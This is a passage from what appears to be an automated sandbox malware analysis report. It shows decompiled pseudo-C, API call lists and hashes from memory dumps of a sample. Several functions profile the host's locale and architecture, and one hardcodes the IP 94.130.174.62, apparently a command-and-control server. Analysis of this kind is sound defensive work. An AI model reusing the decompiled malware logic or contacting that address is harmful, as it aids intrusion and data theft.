                                                                                				intOrPtr _t64;
                                                                                				intOrPtr _t71;
                                                                                				signed int _t72;
                                                                                				void* _t74;
                                                                                
                                                                                				_t58 = __edx;
                                                                                				_t49 = __ebx;
                                                                                				_t72 = _t74 - 0xfc;
                                                                                				_t27 =  *0x447674; // 0x4124c941
                                                                                				 *(_t72 + 0x100) = _t27 ^ _t72;
                                                                                				_push(4);
                                                                                				E00421975(E0043657D, __ebx, __edi, __esi);
                                                                                				_t60 = 0xf;
                                                                                				 *((intOrPtr*)(_t72 - 0x10)) = 0;
                                                                                				 *((intOrPtr*)(_t72 + 0x4c)) = _t60;
                                                                                				 *((intOrPtr*)(_t72 + 0x48)) = 0;
                                                                                				 *((char*)(_t72 + 0x38)) = 0;
                                                                                				 *((intOrPtr*)(_t72 - 4)) = 0;
                                                                                				 *((short*)(_t72 + 0x54)) = 0;
                                                                                				E00427E30(_t72 + 0x56, 0, 0xa8);
                                                                                				_push(0x55);
                                                                                				_push(_t72 + 0x54);
                                                                                				if( *0x44a124() != 0) {
                                                                                					E004037E9(_t72 + 0x1c, _t72 + 0x54);
                                                                                					 *((char*)(_t72 - 4)) = 1;
                                                                                					_t40 = E00417554(_t72 + 0x1c, _t58, _t72);
                                                                                					 *((char*)(_t72 - 4)) = 2;
                                                                                					E0040CFB8(_t72 + 0x38, _t40);
                                                                                					E00402C34(_t72, 1, 0);
                                                                                					 *((char*)(_t72 - 4)) = 0;
                                                                                					E00403960(0, _t72 + 0x1c, 1);
                                                                                					 *(__ebx + 0x10) =  *(__ebx + 0x10) & 0;
                                                                                					 *((intOrPtr*)(__ebx + 0x14)) = 0xf;
                                                                                					 *((char*)(__ebx)) = 0;
                                                                                					E0040CFB8(__ebx, _t72 + 0x38);
                                                                                					_push(0);
                                                                                				} else {
                                                                                					 *((intOrPtr*)(__ebx + 0x14)) = _t60;
                                                                                					 *(__ebx + 0x10) = 0;
                                                                                					 *((char*)(__ebx)) = 0;
                                                                                					E0040381A(__ebx, "Unknown");
                                                                                					_push(0);
                                                                                				}
                                                                                				E00402C34(_t72 + 0x38);
                                                                                				 *[fs:0x0] =  *((intOrPtr*)(_t72 - 0xc));
                                                                                				_t64 = 1;
                                                                                				_pop(_t71);
                                                                                				_pop(_t50);
                                                                                				return E0041DEB4(_t49, _t50,  *(_t72 + 0x100) ^ _t72, _t58, _t64, _t71);
                                                                                			}














                                                                                0x00415e72
                                                                                0x00415e72
                                                                                0x00415e79
                                                                                0x00415e7d
                                                                                0x00415e84
                                                                                0x00415e8a
                                                                                0x00415e91
                                                                                0x00415e9a
                                                                                0x00415e9b
                                                                                0x00415e9e
                                                                                0x00415ea1
                                                                                0x00415ea4
                                                                                0x00415eaa
                                                                                0x00415eb2
                                                                                0x00415ebb
                                                                                0x00415ec3
                                                                                0x00415ec8
                                                                                0x00415ed1
                                                                                0x00415ef2
                                                                                0x00415efd
                                                                                0x00415f01
                                                                                0x00415f0b
                                                                                0x00415f0f
                                                                                0x00415f1b
                                                                                0x00415f27
                                                                                0x00415f2b
                                                                                0x00415f30
                                                                                0x00415f33
                                                                                0x00415f3f
                                                                                0x00415f42
                                                                                0x00415f47
                                                                                0x00415ed3
                                                                                0x00415ed3
                                                                                0x00415ed6
                                                                                0x00415ee0
                                                                                0x00415ee3
                                                                                0x00415ee8
                                                                                0x00415ee8
                                                                                0x00415f4e
                                                                                0x00415f58
                                                                                0x00415f60
                                                                                0x00415f61
                                                                                0x00415f62
                                                                                0x00415f77

                                                                                APIs
                                                                                • __EH_prolog3.LIBCMT ref: 00415E91
                                                                                • _memset.LIBCMT ref: 00415EBB
                                                                                • GetUserDefaultLocaleName.KERNEL32(?,00000055,?,?,00000004), ref: 00415EC9
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: DefaultH_prolog3LocaleNameUser_memset
                                                                                • String ID: Unknown
                                                                                • API String ID: 1926270201-1654365787
                                                                                • Opcode ID: 2243663a972f678b143bdf7af4488884c80a301cffa693733af90348c9f11b29
                                                                                • Instruction ID: d9ea72c496eaaa5414d8f42091f19b59f93f1a357cb2a3b62f3b36287fa83042
                                                                                • Opcode Fuzzy Hash: 2243663a972f678b143bdf7af4488884c80a301cffa693733af90348c9f11b29
                                                                                • Instruction Fuzzy Hash: B531D671A04258ABDB10DF69CC457DEBBA8AF14704F40406BF905A72C2C7B8DA48CB96
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • __fltout2.LIBCMT ref: 00DA8012
                                                                                  • Part of subcall function 00DA85D9: ___dtold.LIBCMT ref: 00DA85FF
                                                                                  • Part of subcall function 00DA85D9: _$I10_OUTPUT.LIBCMT ref: 00DA861A
                                                                                  • Part of subcall function 00DA85D9: _strcpy_s.LIBCMT ref: 00DA863A
                                                                                  • Part of subcall function 00DA85D9: __invoke_watson.LIBCMT ref: 00DA864D
                                                                                • __fptostr.LIBCMT ref: 00DA806D
                                                                                  • Part of subcall function 00C73DF7: __getptd_noexit.LIBCMT ref: 00C73DF7
                                                                                  • Part of subcall function 00C7202D: __decode_pointer.LIBCMT ref: 00C72038
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.509144454.0000000000C80000.00000004.00000001.01000000.0000000B.sdmp, Offset: 00C60000, based on PE: true
                                                                                • Associated: 00000011.00000002.508712302.0000000000C60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508759068.0000000000C61000.00000020.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 00000011.00000002.511051633.0000000000DA8000.00000020.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 00000011.00000002.511085555.0000000000DAC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 00000011.00000002.511119912.0000000000DB0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_c60000_file_22613.jbxd
                                                                                Similarity
                                                                                • API ID: I10____dtold__decode_pointer__fltout2__fptostr__getptd_noexit__invoke_watson_strcpy_s
                                                                                • String ID: -
                                                                                • API String ID: 2628802557-2547889144
                                                                                • Opcode ID: 9867b29c8b8db3a91144d3d7a1848221ecdfbb1cc0c9a330caf9ee0591a69c21
                                                                                • Instruction ID: 78ea6c7a6940b87d1a3eed59ab52c2c8e1d794a2800f38fa70811929bd0404b2
                                                                                • Opcode Fuzzy Hash: 9867b29c8b8db3a91144d3d7a1848221ecdfbb1cc0c9a330caf9ee0591a69c21
                                                                                • Instruction Fuzzy Hash: 2821A872E00109AFCF149F78CC858EF7BA9EF49360B048468F915E3251EA35D918E775
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 69%
                                                                                			E0040A958(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
                                                                                				void* _t23;
                                                                                				intOrPtr _t26;
                                                                                				void* _t36;
                                                                                				intOrPtr _t42;
                                                                                				void* _t47;
                                                                                				void* _t48;
                                                                                				void* _t51;
                                                                                
                                                                                				_t51 = __eflags;
                                                                                				_t36 = __ecx;
                                                                                				_push(0x40);
                                                                                				E004219DE(E00436798, __ebx, __edi, __esi);
                                                                                				 *((intOrPtr*)(_t47 - 4)) = 0;
                                                                                				 *((intOrPtr*)(_t47 - 0x18)) = 0xf;
                                                                                				 *((intOrPtr*)(_t47 - 0x1c)) = 0;
                                                                                				 *((char*)(_t47 - 0x2c)) = 0;
                                                                                				_push(0);
                                                                                				_t49 = _t48 - 0x1c;
                                                                                				 *((intOrPtr*)(_t47 - 0x4c)) = _t48 - 0x1c;
                                                                                				 *((char*)(_t47 - 4)) = 1;
                                                                                				E0040410F(_t49, _t47 + 8);
                                                                                				_push(_t47 - 0x48);
                                                                                				_t23 = E0040A0C4(0, _t36, __edi, _t49, _t51);
                                                                                				_t42 = _t47 - 0x2c;
                                                                                				 *((char*)(_t47 - 4)) = 2;
                                                                                				E0040CFB8(_t42, _t23);
                                                                                				 *((char*)(_t47 - 4)) = 1;
                                                                                				E00402C34(_t47 - 0x48, 1, 0);
                                                                                				_t26 =  *((intOrPtr*)(_t47 - 0x2c));
                                                                                				if( *((intOrPtr*)(_t47 - 0x18)) < 0x10) {
                                                                                					_t26 = _t42;
                                                                                				}
                                                                                				_t46 = "ERROR";
                                                                                				_push("ERROR");
                                                                                				_push(_t26);
                                                                                				if( *0x44a1d8() == 0) {
                                                                                					E00403A16("94.130.174.62", __eflags, _t46, 5);
                                                                                				} else {
                                                                                					E00403C13("94.130.174.62", _t47 + 8, 0, 0xffffffff);
                                                                                				}
                                                                                				E00402C34(_t47 - 0x2c, 1, 0);
                                                                                				E00402C34(_t47 + 8, 1, 0);
                                                                                				return E00421A61(0, _t42, _t46);
                                                                                			}










                                                                                0x0040a958
                                                                                0x0040a958
                                                                                0x0040a958
                                                                                0x0040a95f
                                                                                0x0040a966
                                                                                0x0040a969
                                                                                0x0040a970
                                                                                0x0040a973
                                                                                0x0040a976
                                                                                0x0040a977
                                                                                0x0040a97f
                                                                                0x0040a983
                                                                                0x0040a987
                                                                                0x0040a98f
                                                                                0x0040a990
                                                                                0x0040a99a
                                                                                0x0040a99d
                                                                                0x0040a9a1
                                                                                0x0040a9ac
                                                                                0x0040a9b0
                                                                                0x0040a9b9
                                                                                0x0040a9bc
                                                                                0x0040a9be
                                                                                0x0040a9be
                                                                                0x0040a9c0
                                                                                0x0040a9c5
                                                                                0x0040a9c6
                                                                                0x0040a9d4
                                                                                0x0040a9e7
                                                                                0x0040a9d6
                                                                                0x0040a9dd
                                                                                0x0040a9dd
                                                                                0x0040a9f2
                                                                                0x0040a9fd
                                                                                0x0040aa07

                                                                                APIs
                                                                                • __EH_prolog3_GS.LIBCMT ref: 0040A95F
                                                                                  • Part of subcall function 0040A0C4: __EH_prolog3.LIBCMT ref: 0040A0E3
                                                                                  • Part of subcall function 0040CFB8: _memmove.LIBCMT ref: 0040CFD4
                                                                                  • Part of subcall function 00402C34: _memmove.LIBCMT ref: 00402C53
                                                                                • StrCmpCA.SHLWAPI(?,ERROR,00000001,00000000), ref: 0040A9C7
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _memmove$H_prolog3H_prolog3_
                                                                                • String ID: 94.130.174.62$ERROR
                                                                                • API String ID: 2121961925-1872593727
                                                                                • Opcode ID: 98f9c94bcdb17d23357667d92f9ffb83a45d178a0b7e199d3b50367c1d52909a
                                                                                • Instruction ID: ee5dd9aa966b9db6d48cb73b56529966e75c62234c53b1ee6caa7af95aec0528
                                                                                • Opcode Fuzzy Hash: 98f9c94bcdb17d23357667d92f9ffb83a45d178a0b7e199d3b50367c1d52909a
                                                                                • Instruction Fuzzy Hash: D311B9B0D05208AADB10EBA9C846BDF7A7C9F14358F40446BF504B71C2D7B95A44CBAA
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(KERNEL32,00DA7757), ref: 00DA82B4
                                                                                • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00DA82C4
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.511051633.0000000000DA8000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00C60000, based on PE: true
                                                                                • Associated: 00000011.00000002.508712302.0000000000C60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508759068.0000000000C61000.00000020.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 00000011.00000002.509144454.0000000000C80000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 00000011.00000002.511085555.0000000000DAC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 00000011.00000002.511119912.0000000000DB0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_c60000_file_22613.jbxd
                                                                                Similarity
                                                                                • API ID: AddressHandleModuleProc
                                                                                • String ID: IsProcessorFeaturePresent$KERNEL32
                                                                                • API String ID: 1646373207-3105848591
                                                                                • Opcode ID: 1a316d783e16cb874dc96d72b9e5f0dd665dc099e9312ae3e52d8c1842a121dd
                                                                                • Instruction ID: 1918f3ed3be030fde84cd22f9f9d17fd4cb9540b80ce6aafb7c14e644344bf2f
                                                                                • Opcode Fuzzy Hash: 1a316d783e16cb874dc96d72b9e5f0dd665dc099e9312ae3e52d8c1842a121dd
                                                                                • Instruction Fuzzy Hash: 5BF03031A00A49E2DF201BB2FC0E77F7A75BB82742F850590E5D1A01D4DF71C1B1D265
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetCurrentProcess.KERNEL32(0040ADC3,00000000,?,?,0040ADC3,?,?,?,?,?,?,?,?,?,00000000,.zip), ref: 00415B78
                                                                                • IsWow64Process.KERNEL32(00000000,?,?,0040ADC3,?,?,?,?,?,?,?,?,?,00000000,.zip), ref: 00415B7F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Process$CurrentWow64
                                                                                • String ID: x64$x86
                                                                                • API String ID: 1905925150-1778291495
                                                                                • Opcode ID: 2d775a19ffc2c3d47ea182222121c587e0b07ecb8047f394a79dc6bb17b927d0
                                                                                • Instruction ID: 3c9d3760a5a26c6918296a9b74b1aaa830c4dff7d88253e2d2940ed795ccf6a6
                                                                                • Opcode Fuzzy Hash: 2d775a19ffc2c3d47ea182222121c587e0b07ecb8047f394a79dc6bb17b927d0
                                                                                • Instruction Fuzzy Hash: A5F0A0B1A44304FBDB20DFA48984A9ABAFCBB00744B10447FA00293241D6B8AF048719
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 96%
                                                                                			E004206E9(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
                                                                                				signed int _v8;
                                                                                				signed int _v12;
                                                                                				signed int _v16;
                                                                                				void* __ebx;
                                                                                				void* __edi;
                                                                                				void* __esi;
                                                                                				void* __ebp;
                                                                                				signed int _t56;
                                                                                				signed int _t60;
                                                                                				void* _t65;
                                                                                				signed int _t66;
                                                                                				signed int _t69;
                                                                                				signed int _t71;
                                                                                				signed int _t72;
                                                                                				signed int _t74;
                                                                                				signed int _t75;
                                                                                				signed int _t78;
                                                                                				signed int _t79;
                                                                                				signed int _t81;
                                                                                				signed int _t85;
                                                                                				signed int _t92;
                                                                                				signed int _t93;
                                                                                				signed int _t94;
                                                                                				signed int _t95;
                                                                                				intOrPtr* _t96;
                                                                                				void* _t97;
                                                                                
                                                                                				_t92 = _a8;
                                                                                				if(_t92 == 0 || _a12 == 0) {
                                                                                					L4:
                                                                                					return 0;
                                                                                				} else {
                                                                                					_t96 = _a16;
                                                                                					_t100 = _t96;
                                                                                					if(_t96 != 0) {
                                                                                						_t79 = _a4;
                                                                                						__eflags = _t79;
                                                                                						if(__eflags == 0) {
                                                                                							goto L3;
                                                                                						}
                                                                                						_t60 = _t56 | 0xffffffff;
                                                                                						_t88 = _t60 % _t92;
                                                                                						__eflags = _a12 - _t60 / _t92;
                                                                                						if(__eflags > 0) {
                                                                                							goto L3;
                                                                                						}
                                                                                						_t93 = _t92 * _a12;
                                                                                						__eflags =  *(_t96 + 0xc) & 0x0000010c;
                                                                                						_v8 = _t79;
                                                                                						_v16 = _t93;
                                                                                						_t78 = _t93;
                                                                                						if(( *(_t96 + 0xc) & 0x0000010c) == 0) {
                                                                                							_v12 = 0x1000;
                                                                                						} else {
                                                                                							_v12 =  *(_t96 + 0x18);
                                                                                						}
                                                                                						__eflags = _t93;
                                                                                						if(_t93 == 0) {
                                                                                							L32:
                                                                                							return _a12;
                                                                                						} else {
                                                                                							do {
                                                                                								_t81 =  *(_t96 + 0xc) & 0x00000108;
                                                                                								__eflags = _t81;
                                                                                								if(_t81 == 0) {
                                                                                									L18:
                                                                                									__eflags = _t78 - _v12;
                                                                                									if(_t78 < _v12) {
                                                                                										_t65 = E00425042(_t88, _t93,  *_v8, _t96);
                                                                                										__eflags = _t65 - 0xffffffff;
                                                                                										if(_t65 == 0xffffffff) {
                                                                                											L34:
                                                                                											_t66 = _t93;
                                                                                											L35:
                                                                                											return (_t66 - _t78) / _a8;
                                                                                										}
                                                                                										_v8 = _v8 + 1;
                                                                                										_t69 =  *(_t96 + 0x18);
                                                                                										_t78 = _t78 - 1;
                                                                                										_v12 = _t69;
                                                                                										__eflags = _t69;
                                                                                										if(_t69 <= 0) {
                                                                                											_v12 = 1;
                                                                                										}
                                                                                										goto L31;
                                                                                									}
                                                                                									__eflags = _t81;
                                                                                									if(_t81 == 0) {
                                                                                										L21:
                                                                                										__eflags = _v12;
                                                                                										_t94 = _t78;
                                                                                										if(_v12 != 0) {
                                                                                											_t72 = _t78;
                                                                                											_t88 = _t72 % _v12;
                                                                                											_t94 = _t94 - _t72 % _v12;
                                                                                											__eflags = _t94;
                                                                                										}
                                                                                										_push(_t94);
                                                                                										_push(_v8);
                                                                                										_push(E00426CDE(_t96));
                                                                                										_t71 = E00429E40(_t78, _t88, _t94, _t96, __eflags);
                                                                                										_t97 = _t97 + 0xc;
                                                                                										__eflags = _t71 - 0xffffffff;
                                                                                										if(_t71 == 0xffffffff) {
                                                                                											L36:
                                                                                											 *(_t96 + 0xc) =  *(_t96 + 0xc) | 0x00000020;
                                                                                											_t66 = _v16;
                                                                                											goto L35;
                                                                                										} else {
                                                                                											_t85 = _t94;
                                                                                											__eflags = _t71 - _t94;
                                                                                											if(_t71 <= _t94) {
                                                                                												_t85 = _t71;
                                                                                											}
                                                                                											_v8 = _v8 + _t85;
                                                                                											_t78 = _t78 - _t85;
                                                                                											__eflags = _t71 - _t94;
                                                                                											if(_t71 < _t94) {
                                                                                												goto L36;
                                                                                											} else {
                                                                                												L27:
                                                                                												_t93 = _v16;
                                                                                												goto L31;
                                                                                											}
                                                                                										}
                                                                                									}
                                                                                									_t74 = E0041FD54(_t88, _t96);
                                                                                									__eflags = _t74;
                                                                                									if(_t74 != 0) {
                                                                                										goto L34;
                                                                                									}
                                                                                									goto L21;
                                                                                								}
                                                                                								_t75 =  *(_t96 + 4);
                                                                                								__eflags = _t75;
                                                                                								if(__eflags == 0) {
                                                                                									goto L18;
                                                                                								}
                                                                                								if(__eflags < 0) {
                                                                                									_t45 = _t96 + 0xc;
                                                                                									 *_t45 =  *(_t96 + 0xc) | 0x00000020;
                                                                                									__eflags =  *_t45;
                                                                                									goto L34;
                                                                                								}
                                                                                								_t95 = _t78;
                                                                                								__eflags = _t78 - _t75;
                                                                                								if(_t78 >= _t75) {
                                                                                									_t95 = _t75;
                                                                                								}
                                                                                								E00421230( *_t96, _v8, _t95);
                                                                                								 *(_t96 + 4) =  *(_t96 + 4) - _t95;
                                                                                								 *_t96 =  *_t96 + _t95;
                                                                                								_t97 = _t97 + 0xc;
                                                                                								_t78 = _t78 - _t95;
                                                                                								_v8 = _v8 + _t95;
                                                                                								goto L27;
                                                                                								L31:
                                                                                								__eflags = _t78;
                                                                                							} while (_t78 != 0);
                                                                                							goto L32;
                                                                                						}
                                                                                					}
                                                                                					L3:
                                                                                					 *((intOrPtr*)(E00423E5B(_t100))) = 0x16;
                                                                                					E00424EDB();
                                                                                					goto L4;
                                                                                				}
                                                                                			}





























                                                                                0x004206f4
                                                                                0x004206f9
                                                                                0x00420718
                                                                                0x00000000
                                                                                0x00420701
                                                                                0x00420701
                                                                                0x00420704
                                                                                0x00420706
                                                                                0x0042071f
                                                                                0x00420722
                                                                                0x00420724
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00420726
                                                                                0x0042072b
                                                                                0x0042072d
                                                                                0x00420730
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00420732
                                                                                0x00420736
                                                                                0x0042073d
                                                                                0x00420740
                                                                                0x00420743
                                                                                0x00420745
                                                                                0x0042074f
                                                                                0x00420747
                                                                                0x0042074a
                                                                                0x0042074a
                                                                                0x00420756
                                                                                0x00420758
                                                                                0x0042081d
                                                                                0x00000000
                                                                                0x0042075e
                                                                                0x0042075e
                                                                                0x00420761
                                                                                0x00420761
                                                                                0x00420767
                                                                                0x00420798
                                                                                0x00420798
                                                                                0x0042079b
                                                                                0x004207f4
                                                                                0x004207fb
                                                                                0x004207fe
                                                                                0x00420829
                                                                                0x00420829
                                                                                0x0042082b
                                                                                0x00000000
                                                                                0x0042082f
                                                                                0x00420800
                                                                                0x00420803
                                                                                0x00420806
                                                                                0x00420807
                                                                                0x0042080a
                                                                                0x0042080c
                                                                                0x0042080e
                                                                                0x0042080e
                                                                                0x00000000
                                                                                0x0042080c
                                                                                0x0042079d
                                                                                0x0042079f
                                                                                0x004207ac
                                                                                0x004207ac
                                                                                0x004207b0
                                                                                0x004207b2
                                                                                0x004207b6
                                                                                0x004207b8
                                                                                0x004207bb
                                                                                0x004207bb
                                                                                0x004207bb
                                                                                0x004207bd
                                                                                0x004207be
                                                                                0x004207c8
                                                                                0x004207c9
                                                                                0x004207ce
                                                                                0x004207d1
                                                                                0x004207d4
                                                                                0x00420837
                                                                                0x00420837
                                                                                0x0042083b
                                                                                0x00000000
                                                                                0x004207d6
                                                                                0x004207d6
                                                                                0x004207d8
                                                                                0x004207da
                                                                                0x004207dc
                                                                                0x004207dc
                                                                                0x004207de
                                                                                0x004207e1
                                                                                0x004207e3
                                                                                0x004207e5
                                                                                0x00000000
                                                                                0x004207e7
                                                                                0x004207e7
                                                                                0x004207e7
                                                                                0x00000000
                                                                                0x004207e7
                                                                                0x004207e5
                                                                                0x004207d4
                                                                                0x004207a2
                                                                                0x004207a8
                                                                                0x004207aa
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004207aa
                                                                                0x00420769
                                                                                0x0042076c
                                                                                0x0042076e
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00420770
                                                                                0x00420825
                                                                                0x00420825
                                                                                0x00420825
                                                                                0x00000000
                                                                                0x00420825
                                                                                0x00420776
                                                                                0x00420778
                                                                                0x0042077a
                                                                                0x0042077c
                                                                                0x0042077c
                                                                                0x00420784
                                                                                0x00420789
                                                                                0x0042078c
                                                                                0x0042078e
                                                                                0x00420791
                                                                                0x00420793
                                                                                0x00000000
                                                                                0x00420815
                                                                                0x00420815
                                                                                0x00420815
                                                                                0x00000000
                                                                                0x0042075e
                                                                                0x00420758
                                                                                0x00420708
                                                                                0x0042070d
                                                                                0x00420713
                                                                                0x00000000
                                                                                0x00420713

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                                • String ID:
                                                                                • API String ID: 2782032738-0
                                                                                • Opcode ID: bc16e0bd2feff56e4c9a72fb24abce2d26ec488203f3c75d8a871affbdd8751b
                                                                                • Instruction ID: ad7d1dba2903dca4ed89929e9c99b51ebe4db22c85704b0ca9d15c7edeb43f0b
                                                                                • Opcode Fuzzy Hash: bc16e0bd2feff56e4c9a72fb24abce2d26ec488203f3c75d8a871affbdd8751b
                                                                                • Instruction Fuzzy Hash: E741D331B00624DFDB249F65A88469FBBF5AFC0360F64812EE45597282D778ED41CF88
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E00430DAD(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                				char _v8;
                                                                                				signed int _v12;
                                                                                				char _v20;
                                                                                				void* __ebx;
                                                                                				char _t43;
                                                                                				char _t46;
                                                                                				signed int _t53;
                                                                                				signed int _t54;
                                                                                				intOrPtr _t56;
                                                                                				intOrPtr _t57;
                                                                                				int _t58;
                                                                                				char _t59;
                                                                                				short* _t60;
                                                                                				int _t65;
                                                                                				char* _t72;
                                                                                
                                                                                				_t72 = _a8;
                                                                                				if(_t72 == 0 || _a12 == 0) {
                                                                                					L5:
                                                                                					return 0;
                                                                                				} else {
                                                                                					if( *_t72 != 0) {
                                                                                						E0041EB96(0,  &_v20, _a16);
                                                                                						_t43 = _v20;
                                                                                						__eflags =  *(_t43 + 0x14);
                                                                                						if( *(_t43 + 0x14) != 0) {
                                                                                							_t46 = E00430495( *_t72 & 0x000000ff,  &_v20);
                                                                                							__eflags = _t46;
                                                                                							if(_t46 == 0) {
                                                                                								__eflags = _a4;
                                                                                								_t40 = _v20 + 4; // 0x840ffff8
                                                                                								__eflags = MultiByteToWideChar( *_t40, 9, _t72, 1, _a4, 0 | _a4 != 0x00000000);
                                                                                								if(__eflags != 0) {
                                                                                									L10:
                                                                                									__eflags = _v8;
                                                                                									if(_v8 != 0) {
                                                                                										_t53 = _v12;
                                                                                										_t11 = _t53 + 0x70;
                                                                                										 *_t11 =  *(_t53 + 0x70) & 0xfffffffd;
                                                                                										__eflags =  *_t11;
                                                                                									}
                                                                                									return 1;
                                                                                								}
                                                                                								L21:
                                                                                								_t54 = E00423E5B(__eflags);
                                                                                								 *_t54 = 0x2a;
                                                                                								__eflags = _v8;
                                                                                								if(_v8 != 0) {
                                                                                									_t54 = _v12;
                                                                                									_t33 = _t54 + 0x70;
                                                                                									 *_t33 =  *(_t54 + 0x70) & 0xfffffffd;
                                                                                									__eflags =  *_t33;
                                                                                								}
                                                                                								return _t54 | 0xffffffff;
                                                                                							}
                                                                                							_t56 = _v20;
                                                                                							_t15 = _t56 + 0xac; // 0xff0734ff
                                                                                							_t65 =  *_t15;
                                                                                							__eflags = _t65 - 1;
                                                                                							if(_t65 <= 1) {
                                                                                								L17:
                                                                                								_t24 = _t56 + 0xac; // 0xff0734ff
                                                                                								__eflags = _a12 -  *_t24;
                                                                                								if(__eflags < 0) {
                                                                                									goto L21;
                                                                                								}
                                                                                								__eflags = _t72[1];
                                                                                								if(__eflags == 0) {
                                                                                									goto L21;
                                                                                								}
                                                                                								L19:
                                                                                								_t26 = _t56 + 0xac; // 0xff0734ff
                                                                                								_t57 =  *_t26;
                                                                                								__eflags = _v8;
                                                                                								if(_v8 == 0) {
                                                                                									return _t57;
                                                                                								}
                                                                                								 *((intOrPtr*)(_v12 + 0x70)) =  *(_v12 + 0x70) & 0xfffffffd;
                                                                                								return _t57;
                                                                                							}
                                                                                							__eflags = _a12 - _t65;
                                                                                							if(_a12 < _t65) {
                                                                                								goto L17;
                                                                                							}
                                                                                							__eflags = _a4;
                                                                                							_t21 = _t56 + 4; // 0x840ffff8
                                                                                							_t58 = MultiByteToWideChar( *_t21, 9, _t72, _t65, _a4, 0 | _a4 != 0x00000000);
                                                                                							__eflags = _t58;
                                                                                							_t56 = _v20;
                                                                                							if(_t58 != 0) {
                                                                                								goto L19;
                                                                                							}
                                                                                							goto L17;
                                                                                						}
                                                                                						_t59 = _a4;
                                                                                						__eflags = _t59;
                                                                                						if(_t59 != 0) {
                                                                                							 *_t59 =  *_t72 & 0x000000ff;
                                                                                						}
                                                                                						goto L10;
                                                                                					} else {
                                                                                						_t60 = _a4;
                                                                                						if(_t60 != 0) {
                                                                                							 *_t60 = 0;
                                                                                						}
                                                                                						goto L5;
                                                                                					}
                                                                                				}
                                                                                			}


















                                                                                0x00430db7
                                                                                0x00430dbe
                                                                                0x00430dd5
                                                                                0x00000000
                                                                                0x00430dc5
                                                                                0x00430dc7
